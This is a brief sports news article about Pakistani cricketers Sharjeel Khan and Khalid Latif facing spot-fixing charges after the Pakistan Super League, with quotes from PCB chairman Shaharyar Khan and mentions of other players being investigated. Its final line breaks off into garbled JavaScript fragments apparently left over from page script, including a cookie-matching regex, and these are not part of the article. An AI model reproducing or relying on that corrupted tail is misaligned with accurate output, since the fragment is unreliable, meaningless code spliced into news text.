Pakistan pair Sharjeel Khan and Khalid Latif are set to be charged with spot fixing following last year's Pakistan Super League.

Pakistan Cricket Board chairman Shaharyar Khan announced yesterday that the duo will be formally charged after both players had been provisionally suspended.

"We will formally record their statements on video and then indict them in a day or two," Shaharyar said on Thursday.

"We have to be very careful and make sure the legal process is complete. Legally our stance should be watertight because these players might go to the court."

Shajeel has played one Test, 25 ODIs and 15 international T20s for Pakistan, while Latif has represented his nation in five ODIs and 13 T20s.

However, they are not the only Pakistani players embroiled in spot fixing in relation to the PSL.

Earlier this week, Britain's National Crime Authority arrested two men in relation to PSL spot fixing, one of them believed to be former Pakistan opening batsman Nasir Jamshed.

However, both were released on bail.

Islamabad United's Mohammad Irfan, Quetta Gladiators' Zulfiqar Babar and Karachi Kings' Shazaib Hassan have also all be question by Pakistan's integrity unit. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
